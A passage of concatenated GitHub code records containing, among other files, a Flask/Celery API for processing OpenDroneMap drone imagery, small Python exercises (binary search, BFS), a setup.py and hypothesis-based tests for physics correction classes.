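s.set_age = MethodType(set_age, s)  # bind to this one instance
s.set_age(25)
print(s.age)  # 25
```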
self._birth\n#上面的birth是可读写属性,而age就是一个只读属性,因为age可以根据birth和当前时间计算出来","repo_name":"q57561097/text","sub_path":"dev1/slots.py","file_name":"slots.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24956533646","text":"# coding=utf-8\n\nfrom datetime import datetime\nimport json\nimport shutil\nfrom StringIO import StringIO\nimport subprocess32 as subprocess\nimport os\nimport uuid\n\nfrom cachetools.func import lru_cache\nfrom celery import Celery\nfrom flask import Flask, redirect, request, send_from_directory, jsonify, url_for\nfrom flask_cors import CORS\nfrom flask_uploads import UploadSet, configure_uploads\nfrom flask_tus import tus_manager\nimport rasterio\nfrom rasterio.warp import transform_bounds\nfrom PIL import Image\nfrom werkzeug.wsgi import DispatcherMiddleware\n\n\nAPPLICATION_ROOT = os.environ.get('APPLICATION_ROOT', '')\nREDIS_URL = os.environ.get('REDIS_URL', 'redis://')\nCELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL', REDIS_URL)\nCELERY_DEFAULT_QUEUE = os.environ.get('CELERY_DEFAULT_QUEUE', 'posm-opendronemap-api')\nCELERY_RESULT_BACKEND = os.environ.get('CELERY_RESULT_BACKEND', REDIS_URL)\nPROJECTS_PATH = os.environ.get('PROJECTS_PATH', 'projects')\nUSE_X_SENDFILE = os.environ.get('USE_X_SENDFILE', False)\nUPLOADED_IMAGERY_DEST = os.environ.get('UPLOADED_IMAGERY_DEST', 'uploads/')\n\n# strip trailing slash if necessary\nif PROJECTS_PATH[-1] == '/':\n PROJECTS_PATH = PROJECTS_PATH[:-1]\n\n# add trailing slash if necessary\nif UPLOADED_IMAGERY_DEST[-1] != '/':\n UPLOADED_IMAGERY_DEST = UPLOADED_IMAGERY_DEST[:-1]\n\napp = Flask('posm-opendronemap-api')\nCORS(app)\napp.config['APPLICATION_ROOT'] = APPLICATION_ROOT\napp.config['USE_X_SENDFILE'] = USE_X_SENDFILE\napp.config['UPLOADED_IMAGERY_DEST'] = UPLOADED_IMAGERY_DEST\n\n# Initialize Celery\ncelery = Celery(app.name, broker=CELERY_BROKER_URL)\ncelery.conf.update({\n 'broker_url': CELERY_BROKER_URL,\n 'result_backend': CELERY_RESULT_BACKEND,\n 'task_default_queue': CELERY_DEFAULT_QUEUE,\n 'task_track_started': True,\n})\n\n# Initialize Tus\n# TODO upload to a specific project id\ntm = tus_manager(app, upload_url='/projects/upload',\n upload_folder=app.config['UPLOADED_IMAGERY_DEST'])\n\n# Initialize Flask-Uploads\nimagery = UploadSet('imagery', ('jpg', 'png'))\nconfigure_uploads(app, (imagery,))\n\n\n@tm.upload_file_handler\ndef upload_file_handler(upload_file_path, id=None, filename=None):\n if filename is None:\n filename = os.path.basename(upload_file_path)\n\n if id is None:\n id = str(uuid.uuid4())\n\n images_path = os.path.join(PROJECTS_PATH, id, 'images')\n\n if not os.path.exists(images_path):\n os.makedirs(images_path)\n\n shutil.move(upload_file_path, os.path.join(images_path, filename))\n\n return os.path.join(id, 'images', filename)\n\n\n@celery.task(bind=True)\ndef process_project(self, id):\n started_at = datetime.utcnow()\n project_path = os.path.join(PROJECTS_PATH, id)\n\n command = [\n 'python',\n '/code/run.py',\n '--project-path',\n '.', # this will be executed from the project directory\n ]\n\n def cleanup():\n for dir in ('images_resize', 'odm_georeferencing', 'odm_meshing', 'odm_orthophoto', 'odm_texturing', 'opensfm', 'pmvs'):\n target_path = os.path.join(project_path, dir)\n os.path.isdir(target_path) and shutil.rmtree(target_path)\n os.path.isfile(target_path) and os.unlink(target_path)\n\n self.update_state(state='RUNNING',\n meta={\n 'name': 'opendronemap',\n 'started_at': 
started_at.isoformat(),\n 'status': 'Processing imagery',\n 'task_id': self.request.id,\n })\n\n child = None\n\n try:\n # start by cleaning up in case the previous run was cancelled\n cleanup()\n log_path = os.path.join(project_path, 'logs')\n\n os.path.exists(log_path) or os.mkdir(log_path)\n with open(os.path.join(log_path, 'stdout.log'), 'w+') as stdout:\n with open(os.path.join(log_path, 'stderr.log'), 'w+') as stderr:\n # NOTE: this is used instead of check_call so that we can call terminate() on the\n # child rather than assuming that signals will be passed through and be handled\n # correctly\n child = subprocess.Popen(command, cwd=project_path, stdout=stdout, stderr=stderr)\n child.wait(timeout=60*60*6)\n except subprocess.TimeoutExpired as e:\n child.kill()\n child.wait()\n cleanup()\n\n raise Exception(json.dumps({\n 'name': 'opendronemap',\n 'started_at': started_at.isoformat(),\n 'command': ' '.join(command),\n 'status': 'Timed out'\n }))\n except subprocess.CalledProcessError as e:\n cleanup()\n\n raise Exception(json.dumps({\n 'name': 'opendronemap',\n 'started_at': started_at.isoformat(),\n 'command': e.cmd,\n 'return_code': e.returncode,\n 'status': 'Failed'\n }))\n except:\n if child:\n child.terminate()\n raise\n\n # clean up and move artifacts\n artifacts_path = os.path.join(project_path, 'artifacts')\n if os.path.exists(artifacts_path):\n shutil.rmtree(artifacts_path)\n else:\n os.mkdir(artifacts_path)\n\n for artifact in ('odm_texturing', 'odm_orthophoto/odm_orthophoto.tif', 'odm_orthophoto/odm_orthophoto.png'):\n src_path = os.path.join(project_path, artifact)\n\n if os.path.isdir(src_path):\n for item in os.listdir(src_path):\n shutil.move(os.path.join(src_path, item), artifacts_path)\n else:\n os.path.exists(src_path) and shutil.move(src_path, artifacts_path)\n\n # create a thumbnail\n im = Image.open(os.path.join(artifacts_path, 'odm_orthophoto.png'))\n im.thumbnail((128, 128))\n im.save(os.path.join(artifacts_path, 'ortho_thumb.png'))\n\n with rasterio.drivers():\n with rasterio.open(os.path.join(artifacts_path, 'odm_orthophoto.tif')) as src:\n metadata = get_metadata(id)\n\n metadata.update({\n 'status': {\n 'state': 'SUCCESS',\n },\n 'meta': {\n 'width': src.width,\n 'height': src.height,\n 'resolution': src.res,\n 'crs': str(src.crs),\n 'crs_wkt': src.crs.wkt,\n 'bounds': transform_bounds(src.crs, {'init': 'epsg:4326'}, *src.bounds),\n 'size': os.stat(src.name).st_size,\n }\n })\n\n save_metadata(id, metadata)\n\n cleanup()\n os.unlink(os.path.join(project_path, \"process.task\"))\n\n return {\n 'name': 'preprocess',\n 'completed_at': datetime.utcnow().isoformat(),\n 'started_at': started_at,\n 'status': 'Image processing completed'\n }\n\n\ndef get_task_status(id):\n task_info_path = os.path.join(PROJECTS_PATH, id, 'process.task')\n\n if os.path.exists(task_info_path):\n with open(task_info_path) as t:\n task_id = t.read()\n\n return fetch_status(task_id)\n\n else:\n return {}\n\n\ndef get_metadata(id):\n metadata_path = os.path.join(PROJECTS_PATH, id, 'index.json')\n images_path = os.path.join(PROJECTS_PATH, id, 'images')\n artifacts_path = os.path.join(PROJECTS_PATH, id, 'artifacts')\n\n if os.path.exists(metadata_path):\n with open(metadata_path) as metadata:\n metadata = json.load(metadata)\n else:\n metadata = {\n 'images': [],\n 'artifacts': [],\n 'status': {},\n 'user': {},\n }\n\n if os.path.exists(images_path):\n metadata['images'] = os.listdir(images_path)\n\n if os.path.exists(artifacts_path):\n metadata['artifacts'] = 
os.listdir(artifacts_path)\n\n status = get_task_status(id)\n if status:\n metadata['status'] = status\n\n return metadata\n\n\ndef save_metadata(id, metadata):\n metadata_path = os.path.join(PROJECTS_PATH, id, 'index.json')\n\n if not os.path.exists(os.path.dirname(metadata_path)):\n os.makedirs(os.path.dirname(metadata_path))\n\n with open(metadata_path, 'w') as metadata_file:\n metadata_file.write(json.dumps(metadata))\n\n\n@app.errorhandler(IOError)\ndef handle_ioerror(error):\n return '', 404\n\n\n@app.route('/tasks')\ndef list_tasks():\n i = celery.control.inspect()\n\n status = {\n 'scheduled': i.scheduled(),\n 'active': i.active(),\n 'reserved': i.reserved(),\n }\n\n return jsonify(status), 200\n\n\n@app.route('/projects')\ndef list_projects():\n \"\"\"List available projects\"\"\"\n projects = dict(map(lambda project: (project, get_metadata(project)), filter(\n lambda project: os.path.isdir(os.path.join(PROJECTS_PATH, project)), os.listdir(PROJECTS_PATH))))\n\n return jsonify(projects), 200\n\n\n@app.route('/projects', methods=['PUT'])\ndef create_project():\n body = request.get_json(force=True)\n\n id = str(uuid.uuid4())\n\n metadata = get_metadata(id)\n\n metadata['user'] = body\n\n save_metadata(id, metadata)\n\n return jsonify(metadata), 201\n\n\n@app.route('/projects/', methods=['PATCH', 'POST'])\ndef update_project(id):\n body = request.get_json(force=True)\n\n metadata = get_metadata(id)\n\n if request.method == 'PATCH':\n metadata['user'].update(body)\n else:\n metadata['user'] = body\n\n save_metadata(id, metadata)\n\n return jsonify(metadata), 200\n\n\n@app.route('/projects//upload', methods=['PUT'])\ndef upload_imagery(id):\n path = app.config['UPLOADED_IMAGERY_DEST'] + imagery.save(request.files['file'])\n\n target_path = upload_file_handler(path, id=id)\n\n with app.app_context():\n return jsonify({\n 'project': url_for('get_project', id=id, _external=True),\n }), 200\n\n\n@app.route('/projects/')\ndef get_project(id):\n return jsonify(get_metadata(id)), 200\n\n\n@app.route('/projects//images')\ndef list_project_images(id):\n return jsonify(get_metadata(id)['images']), 200\n\n\n@app.route('/projects//images/')\ndef download_project_image(id, image_id):\n images_path = os.path.join(PROJECTS_PATH, id, 'images')\n return send_from_directory(\n images_path,\n image_id,\n conditional=True\n )\n\n\n@app.route('/projects//images//thumb')\n@lru_cache()\ndef get_project_image_thumbnail(id, image_id):\n im = Image.open(os.path.join(PROJECTS_PATH, id, 'images', image_id))\n out = StringIO()\n im.thumbnail((128, 128))\n im.save(out, \"jpeg\")\n\n return out.getvalue(), 200, {\n 'Content-Type': 'image/jpeg'\n }\n\n\n@app.route('/projects//logs/stderr')\ndef get_project_stderr(id):\n return send_from_directory(\n os.path.join(PROJECTS_PATH, id, 'logs'),\n 'stderr.log',\n conditional=True,\n mimetype='text/plain',\n )\n\n\n@app.route('/projects//logs/stdout')\ndef get_project_stdout(id):\n return send_from_directory(\n os.path.join(PROJECTS_PATH, id, 'logs'),\n 'stdout.log',\n conditional=True,\n mimetype='text/plain',\n )\n\n\n@app.route('/projects//artifacts')\ndef list_project_artifacts(id):\n return jsonify(get_metadata(id)['artifacts']), 200\n\n\n@app.route('/projects//artifacts/')\ndef download_project_artifact(id, artifact_id):\n return send_from_directory(\n os.path.join(PROJECTS_PATH, id, 'artifacts'),\n artifact_id,\n conditional=True\n )\n\n\n@app.route('/projects//process', methods=['POST'])\ndef start_processing_project(id):\n task_info = os.path.join(PROJECTS_PATH, id, 
'process.task')\n\n if os.path.exists(task_info) and not request.args.get('force'):\n return jsonify({\n 'message': 'Processing already in progress, ?force=true to force'\n }), 400\n\n task = process_project.s(id=id).apply_async()\n\n # stash task.id so we know which task to look up\n with open(task_info, 'w') as f:\n f.write(task.id)\n\n return '', 202, {\n 'Location': url_for('get_project_status', id=id)\n }\n\n\n@app.route('/projects//process', methods=['DELETE'])\ndef cancel_processing_project(id):\n task_info = os.path.join(PROJECTS_PATH, id, 'process.task')\n\n with open(task_info) as t:\n task_id = t.read()\n\n celery.control.revoke(task_id, terminate=True)\n\n return '', 201\n\n\ndef fetch_status(task_id):\n result = celery.AsyncResult(task_id)\n\n status = {\n # TODO result.state doesn't account for the states of all children\n 'state': result.state,\n 'steps': []\n }\n\n for _, node in result.iterdeps(intermediate=True):\n if hasattr(node, 'info'):\n if isinstance(node.info, Exception):\n try:\n status['steps'].append(json.loads(node.info.message))\n except:\n status['steps'].append(node.info.message)\n else:\n status['steps'].append(node.info)\n\n return status\n\n\n@app.route('/projects//status')\ndef get_project_status(id):\n task_info = os.path.join(PROJECTS_PATH, id, 'process.task')\n\n if os.path.exists(task_info):\n with open(task_info) as t:\n task_id = t.read()\n\n return jsonify(fetch_status(task_id)), 200\n\n elif os.path.exists(os.path.dirname(task_info)):\n metadata = get_metadata(id)\n return jsonify(metadata['status']), 200\n\n else:\n return '', 404\n\n\napp.wsgi_app = DispatcherMiddleware(None, {\n app.config['APPLICATION_ROOT']: app.wsgi_app\n})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000, debug=True)\n","repo_name":"posm/posm-opendronemap-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13459,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"11726745026","text":"a = [27,36,21,7,4]\ndef cari(a,key):\n awal = 0\n akhir = len(a)\n\n for i in range(awal, akhir):\n tengah = int((awal+akhir)/2)\n if(key == a[tengah]):\n print(\"data ditemukan pada indeks ke \", tengah)\n break\n elif(key < a[tengah]):\n akhir = tengah-1\n else: \n awal = tengah + 1\na.sort()\nprint(a)\ncari(a,36)","repo_name":"shalexandeer/PPL-2021","sub_path":"week10/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6650696285","text":"import setuptools\nimport os\nfrom setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='pandoc-acronyms',\n # the PACKAGE_VERSION variable is defined in the CI runner:\n version=os.environ.get('PACKAGE_VERSION') or '0.0.1.dev0',\n author=\"Mirko Boehm\",\n author_email=\"mirko@kde.org\",\n description=\"A Python filter to manage acronyms\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://gitlab.com/mirkoboehm/pandoc-acronyms\",\n packages=find_packages(),\n include_package_data=True,\n install_requires=[\n 'Click',\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n 'Development Status :: 4 - Beta',\n ],\n entry_points='''\n [console_scripts]\n 
pandoc-acronyms=filter.pandocacronyms:filter\n ''',\n python_requires='>=3.6',\n)\n","repo_name":"elnull/pandoc-acronyms","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6900976656","text":"# 현재 층을 큐에 삽입한 후 상, 하로 움직이면서 목표층에 도달할 수 있는지 파악한다.\n# 도달하는 경우 움직인 최솟값을 출력한다\n# 도달하지 못하는 경우 use the stairs를 출력\n\nfrom collections import deque\n\n\ndef bfs(F, S, G, U, D):\n q = deque([[S, 0]])\n visited = {S}\n\n while q:\n floor, cnt = q.popleft()\n if floor == G: # 목표 층에 도착\n return cnt\n if floor + U <= F and floor + U not in visited: # 위층으로 이동\n q.append([floor + U, cnt + 1])\n visited.add(floor + U)\n if floor - D >= 1 and floor - D not in visited: # 아래층으로 이동\n q.append([floor - D, cnt + 1])\n visited.add(floor - D)\n\n return \"use the stairs\"\n\n\nif __name__ == \"__main__\":\n\n F, S, G, U, D = map(int, input().split())\n\n print(bfs(F, S, G, U, D))\n","repo_name":"kim-jiha95/javascript","sub_path":"python/03_Exam/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71495158015","text":"from collections import namedtuple\n\nimport numpy as np\n\nfrom .. core import fit_functions as fitf\nfrom .. core.exceptions import ParameterNotSet\nfrom .. core.stat_functions import poisson_sigma\nfrom .. core.core_functions import shift_to_bin_centers\nfrom .. reco.corrections import Correction\nfrom .. reco.corrections import Fcorrection\nfrom .. reco.corrections import LifetimeCorrection\nfrom .. reco.corrections import LifetimeRCorrection\nfrom .. reco.corrections import LifetimeXYCorrection\nfrom .. reco.corrections import opt_nearest\nfrom .. reco.corrections import opt_linear\nfrom .. 
reco.corrections import opt_cubic\n\nfrom numpy.testing import assert_allclose\nfrom pytest import fixture\nfrom pytest import mark\nfrom pytest import raises\nfrom flaky import flaky\n\nfrom hypothesis import given\nfrom hypothesis import settings\nfrom hypothesis.strategies import floats\nfrom hypothesis.strategies import integers\nfrom hypothesis.strategies import composite\nfrom hypothesis.extra.numpy import arrays\n\n\ndata_1d = namedtuple(\"data_1d\", \"X E Eu Xdata Edata\")\ndata_2d = namedtuple(\"data_2d\", \"X Y E Eu Xdata Ydata Edata\")\n\nFField_1d = namedtuple(\"Ffield1d\", \"X P Pu F Fu fun u_fun\")\nFField_2d = namedtuple(\"Ffield2d\", \"X Y P Pu F Fu fun u_fun\")\nEField_1d = namedtuple(\"Efield1d\", \"X E Eu F Fu imax\" )\nEField_2d = namedtuple(\"Efield2d\", \"X Y E Eu F Fu imax jmax\")\n\n\n@composite\ndef uniform_energy_1d(draw):\n size = draw(integers(min_value= 2 , max_value=10 ))\n X0 = draw(floats (min_value=-100, max_value=100))\n dX = draw(floats (min_value= 0.1, max_value=100))\n X = np.arange(size) * dX + X0\n E = draw(arrays(float, size, floats(min_value=1e+3, max_value=2e+3)))\n u_rel = draw(arrays(float, size, floats(min_value=1e-2, max_value=2e-1)))\n Eu = E * u_rel\n\n i_max = np.argmax(E)\n e_max = E [i_max]\n u_max = Eu[i_max]\n\n F = E.max()/E\n Fu = F * (Eu**2 / E**2 + u_max**2 / e_max**2)**0.5\n\n return EField_1d(X, E, Eu, F, Fu, i_max)\n\n\n@composite\ndef uniform_energy_2d(draw):\n x_size = draw(integers(min_value=2 , max_value=10 ))\n y_size = draw(integers(min_value=2 , max_value=10 ))\n X0 = draw(floats (min_value=-100, max_value=100))\n Y0 = draw(floats (min_value=-100, max_value=100))\n dX = draw(floats (min_value= 0.1, max_value=100))\n dY = draw(floats (min_value= 0.1, max_value=100))\n X = np.arange(x_size) * dX + X0\n Y = np.arange(y_size) * dY + Y0\n E = draw(arrays(float, (x_size, y_size), floats(min_value = 1e+3,\n max_value = 2e+3)))\n u_rel = draw(arrays(float, (x_size, y_size), floats(min_value = 1e-2,\n max_value = 2e-1)))\n Eu = E * u_rel\n\n i_max = draw(integers(min_value=0, max_value=x_size - 1))\n j_max = draw(integers(min_value=0, max_value=y_size - 1))\n e_max = E [i_max, j_max]\n u_max = Eu[i_max, j_max]\n\n F = e_max / E\n Fu = F * (Eu**2 / E**2 + u_max**2 / e_max**2)**0.5\n\n return EField_2d(X, Y, E, Eu, F.flatten(), Fu.flatten(), i_max, j_max)\n\n\n@composite\ndef uniform_energy_fun_data_1d(draw):\n fun = lambda z, LT, u_LT: fitf.expo(z, 1, LT)\n u_fun = lambda z, LT, u_LT: z * u_LT / LT**2 * fun(z, LT, u_LT)\n LT = draw(floats(min_value=1e+2, max_value=1e+3))\n u_LT = draw(floats(min_value=1e+1, max_value=1e+1))\n Z = np.linspace(0, 600, 100)\n F = fun(Z, LT, u_LT)\n u_F = u_fun(Z, LT, u_LT)\n return FField_1d(Z, LT, u_LT, F, u_F, fun, u_fun)\n\n\n@composite\ndef uniform_energy_fun_data_2d(draw):\n def fun(z, r, a, b, c, u_a, u_b, u_c):\n LT = a - b * r * np.exp(r / c)\n return fitf.expo(z, 1, LT)\n\n def u_fun(z, r, a, b, c, u_a, u_b, u_c):\n LT = a - b * r * np.exp(r / c)\n u_LT = (u_a**2 + u_b**2 * np.exp(2 * r / c) +\n u_c**2 * b**2 * r**2 * np.exp(2 * r / c) / c**4)**0.5\n return z * u_LT / LT**2 * fun(z, r, a, b, c, u_a, u_b, u_c)\n\n a = draw(floats(min_value=1e+2, max_value=1e+3));u_a = 0.1 * a\n b = draw(floats(min_value=1e-2, max_value=1e-1));u_b = 0.1 * b\n c = draw(floats(min_value=1e+3, max_value=5e+3));u_c = 0.1 * c\n Z = np.linspace(0, 600, 100)\n R = np.linspace(0, 200, 100)\n F = fun(Z, R, a, b, c, u_a, u_b, u_c)\n u_F = u_fun(Z, R, a, b, c, u_a, u_b, u_c)\n return FField_2d(Z, R, (a, b, c), (u_a, u_b, 
u_c), F, u_F, fun, u_fun)\n\n\n@composite\ndef uniform_energy_fun_data_3d(draw):\n x_size = draw(integers(min_value= 2 , max_value=10 ))\n y_size = draw(integers(min_value= 2 , max_value=10 ))\n X0 = draw(floats (min_value=-100, max_value=100))\n Y0 = draw(floats (min_value=-100, max_value=100))\n dX = draw(floats (min_value= 0.1, max_value=100))\n dY = draw(floats (min_value= 0.1, max_value=100))\n X = np.arange(x_size) * dX + X0\n Y = np.arange(y_size) * dY + Y0\n\n LTs = draw(arrays(float, (x_size, y_size), floats(min_value = 1e+2,\n max_value = 1e+3)))\n u_LTs = LTs * 0.1\n\n LTc = Correction((X, Y), LTs, u_LTs,\n **opt_nearest)\n\n def LT_corr(z, x, y):\n return np.exp(z / LTc(x, y).value)\n\n def u_LT_corr(z, x, y):\n ltc = LTc(x, y)\n return z * ltc.uncertainty / ltc.value**2 * np.exp(z / ltc.value)\n\n return FField_2d(X, Y, LTs, u_LTs, LTs, u_LTs, LT_corr, u_LT_corr)\n\n\n@fixture\ndef gauss_data_1d():\n mean = lambda z: 1e4 * np.exp(-z / 1000)\n Nevt = 100000\n Zevt = np.random.uniform(0, 500, size=Nevt)\n Eevt = np.random.normal(mean(Zevt), mean(Zevt)**0.5)\n prof = fitf.profileX(Zevt, Eevt, 50, (0, 500))\n return data_1d(*prof, Zevt, Eevt)\n\n\n@fixture\ndef gauss_data_2d():\n mean = lambda x, y: 1e4 * np.exp(-(x**2 + y**2) / 400**2)\n Nevt = 100000\n Xevt = np.random.uniform(-200, 200, size=Nevt)\n Yevt = np.random.uniform(-200, 200, size=Nevt)\n Eevt = np.random.normal(mean(Xevt, Yevt), mean(Xevt, Yevt)**0.5)\n prof = fitf.profileXY(Xevt, Yevt, Eevt, 50, 50, (-200, 200), (-200, 200))\n return data_2d(*prof, Xevt, Yevt, Eevt)\n\n\n#--------------------------------------------------------\n#--------------------------------------------------------\n@mark.parametrize(\"strategy options\".split(),\n ((\"const\", {}),\n (\"index\", {}),\n (\"const\", {\"wrong_option\": None}),\n (\"index\", {\"wrong_option\": None})))\ndef test_correction_raises_exception_when_input_is_incomplete(strategy, options):\n data = np.arange(5)\n with raises(ParameterNotSet):\n Correction((data,), data, data,\n norm_strategy = strategy,\n norm_opts = options,\n **opt_nearest)\n\n\ndef test_correction_raises_exception_when_data_is_invalid():\n x = np.arange( 0, 10)\n y = np.arange(-10, 0)\n z = np.zeros ((x.size, y.size))\n u_z = np.ones ((x.size, y.size))\n with raises(AssertionError):\n Correction((x, y), z, u_z,\n norm_strategy = \"index\",\n norm_opts = {\"index\": (0, 0)},\n **opt_nearest)\n\n\n@given(uniform_energy_1d())\ndef test_correction_attributes_1d(toy_data_1d):\n X, E, Eu, F, Fu, _ = toy_data_1d\n correct = Correction((X,), E, Eu,\n norm_strategy = \"max\",\n **opt_nearest)\n assert_allclose(correct._xs[0], X ) # correct.xs is a list of axis\n assert_allclose(correct._fs , F )\n assert_allclose(correct._us , Fu)\n\n\n@given(uniform_energy_1d())\ndef test_correction_attributes_1d_unnormalized(toy_data_1d):\n X, _, _, F, Fu, _ = toy_data_1d\n c = Correction((X,), F, Fu,\n norm_strategy = None,\n **opt_nearest)\n assert_allclose(c._fs, F )\n assert_allclose(c._us, Fu)\n\n\n@settings(max_examples=1)\n@given(uniform_energy_1d())\ndef test_correction_call_scalar_values_1d(toy_data_1d):\n X, E, Eu, F, Fu, _ = toy_data_1d\n correct = Correction((X,), E, Eu,\n norm_strategy = \"max\",\n **opt_nearest)\n F_corrected, U_corrected = correct(X[0])\n assert F_corrected == F [0]\n assert U_corrected == Fu[0]\n\n\n@given(uniform_energy_1d())\ndef test_correction_call_1d(toy_data_1d):\n X, E, Eu, F, Fu, _ = toy_data_1d\n correct = Correction((X,), E, Eu,\n norm_strategy = \"max\",\n **opt_nearest)\n 
F_corrected, U_corrected = correct(X)\n assert_allclose(F_corrected, F )\n assert_allclose(U_corrected, Fu)\n\n\n@given(uniform_energy_1d())\ndef test_correction_normalization_1d_to_max(toy_data_1d):\n X, E, Eu, *_, i_max = toy_data_1d\n correct = Correction((X,), E, Eu,\n norm_strategy = \"max\",\n **opt_nearest)\n\n x_test = X\n corrected_E = E * correct(x_test).value\n assert_allclose(corrected_E, np.max(E))\n\n\n@given(uniform_energy_1d(),\n floats (min_value=1e-8, max_value=1e8))\ndef test_correction_normalization_1d_to_const(toy_data_1d, norm_value):\n X, E, Eu, _, _, _ = toy_data_1d\n c = Correction((X,), E, Eu,\n norm_strategy = \"const\",\n norm_opts = {\"value\": norm_value},\n **opt_nearest)\n\n assert_allclose(c._fs, norm_value / E)\n assert_allclose(c._us, norm_value / E**2 * Eu)\n\n\n@given(uniform_energy_1d())\ndef test_correction_normalization_to_center_1d(toy_data_1d):\n X, E, Eu, *_ = toy_data_1d\n c = Correction((X,), E, Eu,\n norm_strategy = \"center\")\n\n norm_index = X.size // 2\n norm_value = E [norm_index]\n norm_uncer = Eu[norm_index]\n prop_uncer = (Eu / E)**2 + (norm_uncer / norm_value)**2\n prop_uncer = prop_uncer**0.5 * norm_value / E\n\n assert_allclose(c._fs, norm_value / E)\n assert_allclose(c._us, prop_uncer )\n\n\n@given(uniform_energy_2d())\ndef test_correction_normalization_to_center_2d(toy_data_2d):\n X, Y, E, Eu, *_ = toy_data_2d\n c = Correction((X, Y), E, Eu,\n norm_strategy = \"center\")\n\n norm_index = X.size // 2, Y.size // 2\n norm_value = E [norm_index]\n norm_uncer = Eu[norm_index]\n prop_uncer = (Eu / E)**2 + (norm_uncer / norm_value)**2\n prop_uncer = prop_uncer**0.5 * norm_value / E\n\n assert_allclose(c._fs, norm_value / E)\n assert_allclose(c._us, prop_uncer )\n\n\n#--------------------------------------------------------\n\n@given(uniform_energy_2d())\ndef test_correction_attributes_2d(toy_data_2d):\n X, Y, E, Eu, F, Fu, i_max, j_max = toy_data_2d\n correct = Correction((X, Y), E, Eu,\n norm_strategy = \"index\",\n norm_opts = {\"index\": (i_max, j_max)},\n **opt_nearest)\n\n # attributes of the Correction class are 2d arrays,\n # so they must be flatten for comparison\n assert_allclose(correct._fs.flatten(), F )\n assert_allclose(correct._us.flatten(), Fu)\n\n\n@given(uniform_energy_2d())\n@settings(deadline=None)\ndef test_correction_attributes_2d_unnormalized(toy_data_2d):\n X, Y, _, _, F, Fu, _, _ = toy_data_2d\n c = Correction((X, Y), F, Fu,\n norm_strategy = None,\n **opt_nearest)\n\n assert_allclose(c._fs, F )\n assert_allclose(c._us, Fu)\n\n\n@settings(max_examples=1)\n@given(uniform_energy_2d())\ndef test_correction_call_scalar_values_2d(toy_data_2d):\n X, Y, E, Eu, F, Fu, i_max, j_max = toy_data_2d\n correct = Correction((X,Y), E, Eu,\n norm_strategy = \"index\",\n norm_opts = {\"index\": (i_max, j_max)},\n **opt_nearest)\n\n F_corrected, U_corrected = correct(X[0], Y[0])\n assert F_corrected == F [0]\n assert U_corrected == Fu[0]\n\n\n@given(uniform_energy_2d())\ndef test_correction_normalization_2d_to_max(toy_data_2d):\n X, Y, E, Eu, *_, i_max = toy_data_2d\n correct = Correction((X, Y), E, Eu,\n norm_strategy = \"max\")\n\n x_test = np.repeat(X, Y.size)\n y_test = np.tile (Y, X.size)\n corrected_E = E.flatten() * correct(x_test, y_test).value\n assert_allclose(corrected_E, np.max(E))\n\n\n@given(uniform_energy_2d())\ndef test_correction_call_2d(toy_data_2d):\n X, Y, E, Eu, F, Fu, i_max, j_max = toy_data_2d\n correct = Correction((X, Y), E, Eu,\n norm_strategy = \"index\",\n norm_opts = {\"index\": (i_max, j_max)},\n 
**opt_nearest)\n\n # create a collection of (x,y) point such that the\n # x coordinates are stored in X_sample and the y coordinates in Y_sample\n X_sample = np.array([x for x in X for _ in Y])\n Y_sample = np.array([y for _ in X for y in Y])\n\n F_corrected, U_corrected = correct(X_sample, Y_sample)\n assert_allclose(F_corrected, F )\n assert_allclose(U_corrected, Fu)\n\n\n#--------------------------------------------------------\n\n@given(uniform_energy_fun_data_1d())\ndef test_fcorrection(toy_f_data):\n Z, LT, u_LT, F, u_F, fun, u_fun = toy_f_data\n correct = Fcorrection(fun, u_fun, (LT, u_LT))\n f_corrected, u_corrected = correct(Z)\n\n assert_allclose( F, f_corrected)\n assert_allclose(u_F, u_corrected)\n\n\n@given(uniform_energy_fun_data_1d())\ndef test_lifetimecorrection(toy_f_data):\n Z, LT, u_LT, F, u_F, fun, u_fun = toy_f_data\n correct = LifetimeCorrection(LT, u_LT)\n f_corrected, u_corrected = correct(Z)\n\n assert_allclose( F, f_corrected)\n assert_allclose(u_F, u_corrected)\n\n\n@given(uniform_energy_fun_data_2d())\ndef test_lifetimeRcorrection(toy_f_data):\n Z, R, pars, u_pars, F, u_F, fun, u_fun = toy_f_data\n correct = LifetimeRCorrection(pars, u_pars)\n f_corrected, u_corrected = correct(Z, R)\n\n assert_allclose( F, f_corrected)\n assert_allclose(u_F, u_corrected)\n\n\n@given(uniform_energy_fun_data_3d())\ndef test_lifetimeXYcorrection(toy_f_data):\n Xgrid, Ygrid, LTs, u_LTs, LTs, u_LTs, LT_corr, u_LT_corr = toy_f_data\n\n X = np.repeat (Xgrid, Ygrid.size)\n Y = np.tile (Ygrid, Xgrid.size)\n Z = np.linspace(0, 50, X .size)\n F, u_F = LT_corr(Z, X, Y), u_LT_corr(Z, X, Y)\n correct = LifetimeXYCorrection(LTs, u_LTs, Xgrid, Ygrid, **opt_nearest)\n f_corrected, u_corrected = correct(Z, X, Y)\n\n assert_allclose( F, f_corrected)\n assert_allclose(u_F, u_corrected)\n\n\n@given(uniform_energy_fun_data_3d())\n@settings(deadline=None)\ndef test_lifetimeXYcorrection_kwargs(toy_f_data):\n Xgrid, Ygrid, LTs, u_LTs, LTs, u_LTs, LT_corr, u_LT_corr = toy_f_data\n kwargs = {\"norm_strategy\" : \"const\",\n \"norm_opts\" : {\"value\": 1},\n 